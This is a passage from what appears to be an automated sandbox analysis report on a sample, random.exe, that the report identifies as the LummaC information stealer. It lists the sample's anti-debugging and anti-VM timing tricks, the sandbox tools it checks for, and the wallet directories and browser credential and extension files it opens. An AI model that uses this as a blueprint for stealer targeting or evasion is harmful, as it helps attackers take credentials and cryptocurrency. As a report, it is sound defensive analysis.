            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860D2C second address: 4860D30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860D30 second address: 4860D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F8874D4CC95h 0x0000000f pushad 0x00000010 mov eax, 6FFEC5DDh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860D57 second address: 4860D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c mov ecx, ebx 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860D66 second address: 4860D6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860D6C second address: 4860DB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F887475ED9Dh 0x00000014 add cx, 5AD6h 0x00000019 jmp 00007F887475EDA1h 0x0000001e popfd 0x0000001f call 00007F887475EDA0h 0x00000024 pop esi 0x00000025 popad 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860DB1 second address: 4860DE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F8874D4CC90h 0x00000010 je 00007F88E747A266h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov dx, 0D70h 0x0000001d movsx edx, ax 0x00000020 popad 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860DE8 second address: 4860E15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475ED9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [76FF459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F887475EDA5h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860E15 second address: 4860EB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 72h 0x00000005 pushfd 0x00000006 jmp 00007F8874D4CC98h 0x0000000b jmp 00007F8874D4CC95h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 je 00007F88E74922D1h 0x0000001a pushad 0x0000001b movzx ecx, di 0x0000001e call 00007F8874D4CC99h 0x00000023 movzx ecx, di 0x00000026 pop edi 0x00000027 popad 0x00000028 xchg eax, esi 0x00000029 jmp 00007F8874D4CC98h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F8874D4CC8Ch 0x00000038 or ah, 00000068h 0x0000003b jmp 00007F8874D4CC8Bh 0x00000040 popfd 0x00000041 mov bx, cx 0x00000044 popad 0x00000045 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860EB1 second address: 4860EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860EB7 second address: 4860EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860EBB second address: 4860EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860EBF second address: 4860ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860ECD second address: 4860ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860ED4 second address: 4860EDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860F1E second address: 4860F22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860F22 second address: 4860F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860F28 second address: 4860F4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475ED9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F887475ED9Bh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860F69 second address: 4860F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860F6D second address: 4860F8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475EDA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860F8A second address: 4860F90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860F90 second address: 4860F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860F94 second address: 4860FB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dh, 3Eh 0x00000011 mov edx, esi 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860FB6 second address: 4860FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860FBC second address: 4860FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860FC0 second address: 4860FE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475ED9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F887475EDA0h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4860FE6 second address: 4860FEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Tries to evade debugger and weak emulator (self modifying code)
            Source: C:\Users\user\Desktop\random.exeSpecial instruction interceptor: First address: E10C31 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\random.exeSpecial instruction interceptor: First address: E774E0 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\random.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\Desktop\random.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\random.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\random.exe TID: 1232Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\random.exe TID: 7208Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: random.exe, random.exe, 00000000.00000002.1501932242.0000000000DC6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: random.exe, 00000000.00000002.1500778227.0000000000647000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH@i%SystemRoot%\system32\mswsock.dll`
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: random.exe, 00000000.00000003.1413321325.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1408039959.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1379086066.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1411680936.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1462407076.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1279130057.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1499960717.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1501061112.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1378752783.0000000000691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: random.exe, 00000000.00000003.1312819356.00000000051EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: random.exe, 00000000.00000003.1413321325.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1408039959.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1379086066.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1411680936.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1462407076.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1279130057.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1499960717.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1501061112.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1378752783.0000000000691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWG
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: random.exe, 00000000.00000002.1501932242.0000000000DC6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: random.exe, 00000000.00000003.1312928360.00000000051DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\random.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\random.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Hides threads from debuggers
            Source: C:\Users\user\Desktop\random.exeThread information set: HideFromDebuggerJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (window names)
            Source: C:\Users\user\Desktop\random.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\Desktop\random.exeOpen window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\random.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\random.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\random.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\random.exeOpen window title or class name: ollydbg
            Source: C:\Users\user\Desktop\random.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\Desktop\random.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\random.exeFile opened: NTICE
            Source: C:\Users\user\Desktop\random.exeFile opened: SICE
            Source: C:\Users\user\Desktop\random.exeFile opened: SIWVID
            Source: C:\Users\user\Desktop\random.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\random.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\random.exeProcess queried: DebugPortJump to behavior
            Source: random.exe, 00000000.00000002.1502067939.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
            Source: C:\Users\user\Desktop\random.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\random.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: random.exe, 00000000.00000003.1413321325.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1413321325.0000000000664000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1413175912.0000000000700000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1411756505.000000000070A000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1411773515.0000000000664000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1462639526.0000000000664000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1411680936.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1500908640.0000000000664000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1462407076.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1411599231.0000000000700000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1499960717.0000000000691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: random.exe PID: 6660, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: random.exe, 00000000.00000003.1378865855.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ctrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0
            Source: random.exeString found in binary or memory: 1520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/E
            Source: random.exe, 00000000.00000003.1413321325.0000000000691000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: random.exe, 00000000.00000003.1378865855.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wa$
            Source: random.exe, 00000000.00000003.1378865855.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,0
            Source: random.exe, 00000000.00000003.1378865855.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: n":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfX
            Source: random.exeString found in binary or memory: Wallets/Ethereum
            Source: random.exe, 00000000.00000003.1378704518.00000000006E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: random.exe, 00000000.00000003.1378865855.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520}
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
